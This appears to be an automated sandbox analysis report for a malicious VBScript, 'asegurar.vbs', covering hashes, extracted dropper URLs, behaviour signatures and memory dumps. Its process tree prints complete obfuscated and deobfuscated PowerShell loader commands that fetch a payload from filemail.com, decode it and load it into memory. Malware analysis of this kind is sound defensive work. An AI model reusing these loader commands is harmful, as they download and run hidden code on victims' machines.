Overview

overview

10

Static

static

1

asegurar.vbs

windows7-x64

10

asegurar.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    25-11-2024 07:09

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    asegurar.vbs

  • Size

    139KB

  • MD5

    b6a19737eef49bc1fda3686ea04fefd2

  • SHA1

    e4f14e237fcd865694ce29862f58c063c0efe995

  • SHA256

    93db398a854042d2a23e61cd308a05d21fb85a6b5c28206c585a6221ac583cd6

  • SHA512

    03145176ca0d828034a4c6907213bcf6478a64134a9fd7a79026ea5ae250dc79d43da1d0cb005e18d0be4bb46373d36302f7369bfc5457be745ba3f50072e887

  • SSDEEP

    3072:boU4gHKIuQzOTbEeqZfCPgyoL4EairFgt5pJGwm:bLKAubqZTyo9

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\asegurar.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2104
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUnZpaW1hZ2VVcmwgPSBpOHhodHRwczonKycvLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9mJysnaWxla2UnKyd5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXAnKydUOXBnU1NsdlN0R3JuVElDZkZobVRLajNMJysnQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTRiYjIwOWMnKyc2MmMxNzMwOTQ1MTc2YTA5MDRmICcrJ2k4eDtSdml3ZWJDbGllbnQnKycgPSBOZXctT2JqZWMnKyd0IFN5c3RlbS5OZXQuV2ViQ2xpZW50JysnO1J2aWltYWdlQnl0ZXMgPSBSdml3ZWJDbGllbnQuRG93bmxvYWREYXRhKFJ2aWltYWdlVXJsKTtSdmlpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVJysnVEY4LkdldFN0cmluZycrJyhSdmlpJysnbWFnZUJ5dGVzKTtSdmlzdGFydEZsJysnYWcgPSBpOHg8PEJBU0U2NF9TVEFSVD4+aTh4JysnO1J2aWVuZEYnKydsYWcgPSBpOHg8PEJBUycrJ0U2NF9FTkQ+Pmk4eDtSdmlzdGFydEluZGV4ID0gUnZpaW1hZ2VUZXh0LkluZGV4T2YoUnZpc3RhcicrJ3RGbGFnKTtSdmllbmRJbmRleCA9IFJ2aWltYWdlVGV4dC5JbmRleE9mKFJ2aWVuJysnZEZsYWcpO1J2aXN0YXJ0SW5kZXggLWdlIDAgLWFuZCBSdmknKydlbmRJbmRleCAtZ3QgUnZpc3RhcnRJbmRleDtSdmlzdGFydEluZGV4ICs9IFJ2aXN0YXJ0RmxhZy5MZW5ndGg7UnZpJysnYmFzZTY0TGVuZ3RoID0gUnZpZW5kSW5kZXggLSBSdmlzdGFydEluZGV4O1J2aWJhc2U2NENvbW1hbmQgPSAnKydSdmlpbWFnZVRlJysneHQuU3Vic3RyaW5nKFJ2aXN0YXJ0SW5kZXgsIFJ2aWJhc2U2NExlbmd0aCk7UnZpYmFzZScrJzY0UmV2ZXJzZWQgJysnPSAtam9pbiAoJysnUnZpYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFRGWCBGb3JFYWNoLU9iamVjdCB7IFJ2aV8gfSlbLTEuLi0oUnZpYmEnKydzZTY0Q29tJysnbWFuZC5MZW5ndGgpJysnXTtSdmljb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFJ2aWJhc2U2JysnNFJldmVyc2VkKTtSdmlsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbCcrJ2VjdGlvbi5Bc3NlbWJseV06OkxvYWQoUnZpY29tbWFuZEJ5dGVzKTtSdml2YWlNZXRob2QgPSBbJysnZG4nKydsaWIuSU8uSG9tZV0uR2V0TWV0aG9kKGk4eFZBSWk4eCk7UnZpdmFpTWV0aG9kLkludm9rZShSdmludWxsLCBAKCcrJ2k4eDAvM3hRYnUvZC9lZS5ldHNhcC8vOnNwdHRoaTh4LCBpOHhkZXNhdGl2YWRvaTh4LCBpOHhkZScrJ3NhdGl2YWRvaTh4LCBpOHhkZXNhdGl2YWRvaTh4LCBpOHhBZGRJblByb2Nlc3MzMmk4eCwgaTh4JysnZGVzYXRpdmFkb2k4eCwgJysnaTh4ZGVzYXRpdmEnKydkb2k4eCxpOHhkZXNhdGl2YWRvaTh4LGk4eGRlc2F0aXZhZG9pOHgsaTh4ZGVzYXRpdmFkb2k4eCxpOHhkZXNhdGl2YWRvaTh4LGk4eGRlc2F0aXZhZG9pOHgnKycsaTh4MWk4eCcrJyxpOHhkZXNhdGl2YWRvaTh4KSk7JykgIC1yRXBsYWNFKFtDaEFSXTg0K1tDaEFSXTcwK1tDaEFSXTg4KSxbQ2hBUl0xMjQgIC1DUmVQTGFDRSAnaTh4JyxbQ2hBUl0zOS1DUmVQTGFDRSAgKFtDaEFSXTgyK1tDaEFSXTExOCtbQ2hBUl0xMDUpLFtDaEFSXTM2KSB8IC4gKCAkRW52OmNvbVNQZUNbNCwxNSwyNV0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2928
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('RviimageUrl = i8xhttps:'+'//1017.filemail.com/api/file/get?f'+'ileke'+'y=2Aa_bWo9Reu45t7BU1kVgsd9p'+'T9pgSSlvStGrnTICfFhmTKj3L'+'C6SQtIcOc_T35w&pk_vid=fd4f614bb209c'+'62c1730945176a0904f '+'i8x;RviwebClient'+' = New-Objec'+'t System.Net.WebClient'+';RviimageBytes = RviwebClient.DownloadData(RviimageUrl);RviimageText = [System.Text.Encoding]::U'+'TF8.GetString'+'(Rvii'+'mageBytes);RvistartFl'+'ag = i8x<<BASE64_START>>i8x'+';RviendF'+'lag = i8x<<BAS'+'E64_END>>i8x;RvistartIndex = RviimageText.IndexOf(Rvistar'+'tFlag);RviendIndex = RviimageText.IndexOf(Rvien'+'dFlag);RvistartIndex -ge 0 -and Rvi'+'endIndex -gt RvistartIndex;RvistartIndex += RvistartFlag.Length;Rvi'+'base64Length = RviendIndex - RvistartIndex;Rvibase64Command = '+'RviimageTe'+'xt.Substring(RvistartIndex, Rvibase64Length);Rvibase'+'64Reversed '+'= -join ('+'Rvibase64Command.ToCharArray() TFX ForEach-Object { Rvi_ })[-1..-(Rviba'+'se64Com'+'mand.Length)'+'];RvicommandBytes = [System.Convert]::FromBase64String(Rvibase6'+'4Reversed);RviloadedAssembly = [System.Refl'+'ection.Assembly]::Load(RvicommandBytes);RvivaiMethod = ['+'dn'+'lib.IO.Home].GetMethod(i8xVAIi8x);RvivaiMethod.Invoke(Rvinull, @('+'i8x0/3xQbu/d/ee.etsap//:sptthi8x, i8xdesativadoi8x, i8xde'+'sativadoi8x, i8xdesativadoi8x, i8xAddInProcess32i8x, i8x'+'desativadoi8x, '+'i8xdesativa'+'doi8x,i8xdesativadoi8x,i8xdesativadoi8x,i8xdesativadoi8x,i8xdesativadoi8x,i8xdesativadoi8x'+',i8x1i8x'+',i8xdesativadoi8x));') -rEplacE([ChAR]84+[ChAR]70+[ChAR]88),[ChAR]124 -CRePLaCE 'i8x',[ChAR]39-CRePLaCE ([ChAR]82+[ChAR]118+[ChAR]105),[ChAR]36) | . ( $Env:comSPeC[4,15,25]-JoiN'')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3060

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    d6a4afca558ae2105b3a196764d6a175

    SHA1

    74539409505e5b38ba3eaa293e93f76bdf76eaea

    SHA256

    f0c4dad558e1ede40b896fb738470fa186f53b8aa1d6835f3bd22c71b18165d0

    SHA512

    8dc2a874bd6f0610ca5cb2d33591ace4cf369b59c0f451120c9446f42dff8e7bf017eb489f58d37f2e1f9376b3836127723ae94d7038adc14150240f28a608a3

    Download Submit

  • memory/2928-4-0x000007FEF587E000-0x000007FEF587F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2928-5-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2928-6-0x0000000002720000-0x0000000002728000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2928-8-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2928-7-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2928-9-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2928-10-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2928-16-0x000007FEF55C0000-0x000007FEF5F5D000-memory.dmp

    Filesize

    9.6MB

    Download